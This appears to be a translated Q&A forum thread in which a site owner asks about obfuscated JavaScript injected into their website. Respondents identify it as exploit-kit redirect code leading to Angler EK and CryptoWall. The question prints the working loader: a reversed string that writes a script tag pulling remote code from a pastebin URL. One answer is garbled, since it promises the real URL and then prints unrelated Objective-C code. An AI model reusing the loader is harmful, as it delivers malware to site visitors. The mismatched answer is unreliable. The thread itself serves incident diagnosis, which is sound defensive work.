我最近在我的网站上看到了以下代码
<script type=""text/javascript"">
document.write('>tpircs/<>""YWVPsGmx=i?php.war/moc.nibetsap//:ptth""=crs tpircs<'.split("""").reverse().join(""""))
</script>
这段代码有什么作用?我是XSS的受害者吗?我的托管公司可以做什么,比如恶意软件扫描程序等吗?
答案 0 :(得分:0)
该文本被反转形成一个pastebin链接 - 该pastebin上的脚本被加载并在浏览器中与其余的站点代码一起运行。
答案 1 :(得分:0)
这是Exploit Kit的重定向代码..实际的URL是
#import "UIResponder+FirstResponder.h"
static __weak id currentFirstResponder;
@implementation UIResponder (FirstResponder)
+(id)currentFirstResponder {
currentFirstResponder = nil;
[[UIApplication sharedApplication] sendAction:@selector(findFirstResponder:) to:nil from:nil forEvent:nil];
return currentFirstResponder;
}
-(void)findFirstResponder:(id)sender {
currentFirstResponder = self;
}
请从您服务器上托管的所有网页中删除此代码。
答案 2 :(得分:0)
您的网站遭到入侵(黑客攻击)并注入了恶意的javascript代码。
它使用多种重定向/编码方法,但最后,将访问者推送到Angler EK(漏洞利用工具包),然后尝试在用户身上使用CryptoWall。
您可以尝试在此处扫描:
http://www.unmaskparasites.com/
查找有关恶意软件的更多详细信息。
感谢,